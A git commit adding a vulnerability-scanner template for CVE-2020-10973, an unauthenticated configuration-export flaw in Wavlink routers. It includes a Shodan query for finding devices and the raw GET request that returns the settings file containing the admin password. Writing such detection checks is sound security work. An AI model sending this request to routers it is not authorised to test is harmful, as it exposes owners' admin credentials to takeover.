Create CVE-2020-10973.yaml

patch-1
Arafat Ansari 2022-08-14 17:26:35 +05:30 committed by GitHub
parent 689a07d542
commit f4e7fc7817
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: CVE-2020-10973
info:
name: Wavlink WN530HG4 - Access Control
author: arafatansari
severity: medium
description: |
An issue was discovered in Wavlink WN530HG4, Wavlink WN531G3, Wavlink WN533A8, and Wavlink WN551K1 affecting /cgi-bin/ExportAllSettings.sh where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10973
metadata:
shodan-query: http.html:"WN551K1"
verified: "true"
tags: access,control,cve,2020
requests:
- raw:
- |
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'url=/backupsettings.dat'